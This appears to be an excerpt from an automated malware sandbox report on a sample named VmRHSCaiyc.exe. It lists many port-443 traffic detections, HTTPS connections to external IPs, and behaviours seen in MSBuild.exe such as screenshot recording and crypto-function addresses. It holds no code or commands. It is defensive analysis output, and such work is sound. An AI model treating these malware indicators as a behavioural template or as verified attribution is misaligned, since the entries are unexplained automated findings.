Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925

Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.7:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49990 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_00411F2A

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_0040145B GetCurrentProcess,NtQueryInformationProcess,

5_2_0040145B

Detected potential crypto function

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00352021	4_2_00352021
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AA22B	4_2_003AA22B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0035729C	4_2_0035729C
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0036D39B	4_2_0036D39B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0039E3DF	4_2_0039E3DF
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003994DB	4_2_003994DB
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00396570	4_2_00396570
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AA5C9	4_2_003AA5C9
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0036572C	4_2_0036572C
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0039877B	4_2_0039877B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AA99B	4_2_003AA99B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0035CAF2	4_2_0035CAF2
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0036BB36	4_2_0036BB36
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00363C92	4_2_00363C92
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00351D79	4_2_00351D79
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003A9D96	4_2_003A9D96
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003AAD83	4_2_003AAD83
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0035FEF0	4_2_0035FEF0
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00359F96	4_2_00359F96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041B8A3	5_2_0041B8A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042DAC3	5_2_0042DAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042D353	5_2_0042D353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041C603	5_2_0041C603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042D6F1	5_2_0042D6F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00419698	5_2_00419698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042DEAB	5_2_0042DEAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0042CEBE	5_2_0042CEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D398D20	5_2_6D398D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DED70	5_2_6D2DED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D33AD50	5_2_6D33AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D214DB0	5_2_6D214DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A6D90	5_2_6D2A6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D39CDC0	5_2_6D39CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EAC30	5_2_6D2EAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D6C00	5_2_6D2D6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D21AC60	5_2_6D21AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D20ECC0	5_2_6D20ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26ECD0	5_2_6D26ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D350F20	5_2_6D350F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D216F10	5_2_6D216F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D2F70	5_2_6D2D2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D27EF40	5_2_6D27EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D358FB0	5_2_6D358FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D21EFB0	5_2_6D21EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D210FE0	5_2_6D210FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EEFF0	5_2_6D2EEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2F0E20	5_2_6D2F0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AEE70	5_2_6D2AEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D296E90	5_2_6D296E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D21AEC0	5_2_6D21AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2B0EC0	5_2_6D2B0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D266900	5_2_6D266900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D248960	5_2_6D248960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A09A0	5_2_6D2A09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2CA9A0	5_2_6D2CA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D09B0	5_2_6D2D09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D32C9E0	5_2_6D32C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2449F0	5_2_6D2449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D260820	5_2_6D260820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D29A820	5_2_6D29A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E4840	5_2_6D2E4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D3168E0	5_2_6D3168E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2B0BA0	5_2_6D2B0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D316BE0	5_2_6D316BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C8A30	5_2_6D2C8A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2BEA00	5_2_6D2BEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D28CA70	5_2_6D28CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D28EA80	5_2_6D28EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D272560	5_2_6D272560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2B0570	5_2_6D2B0570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D358550	5_2_6D358550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D268540	5_2_6D268540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D314540	5_2_6D314540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2045B0	5_2_6D2045B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DA5E0	5_2_6D2DA5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D29E5F0	5_2_6D29E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D274420	5_2_6D274420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D29A430	5_2_6D29A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D228460	5_2_6D228460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D33A480	5_2_6D33A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2564D0	5_2_6D2564D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AA4D0	5_2_6D2AA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D290700	5_2_6D290700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D23A7D0	5_2_6D23A7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26C650	5_2_6D26C650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26E6E0	5_2_6D26E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AE6E0	5_2_6D2AE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2346D0	5_2_6D2346D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D286130	5_2_6D286130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2F4130	5_2_6D2F4130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D278140	5_2_6D278140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2101E0	5_2_6D2101E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DC000	5_2_6D2DC000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D8010	5_2_6D2D8010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D25E070	5_2_6D25E070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2200B0	5_2_6D2200B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EC0B0	5_2_6D2EC0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D208090	5_2_6D208090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D282320	5_2_6D282320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D352370	5_2_6D352370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D212370	5_2_6D212370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D32C360	5_2_6D32C360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A6370	5_2_6D2A6370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D218340	5_2_6D218340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2423A0	5_2_6D2423A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26E3B0	5_2_6D26E3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2643E0	5_2_6D2643E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E8220	5_2_6D2E8220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DA210	5_2_6D2DA210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D298260	5_2_6D298260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A8250	5_2_6D2A8250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E22A0	5_2_6D2E22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2DE2B0	5_2_6D2DE2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D3962C0	5_2_6D3962C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D273D00	5_2_6D273D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D203D80	5_2_6D203D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D359D90	5_2_6D359D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E1DC0	5_2_6D2E1DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D221C30	5_2_6D221C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D213C40	5_2_6D213C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D339C40	5_2_6D339C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AFC80	5_2_6D2AFC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D1CE0	5_2_6D2D1CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D34DCD0	5_2_6D34DCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D245F20	5_2_6D245F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D205F30	5_2_6D205F30
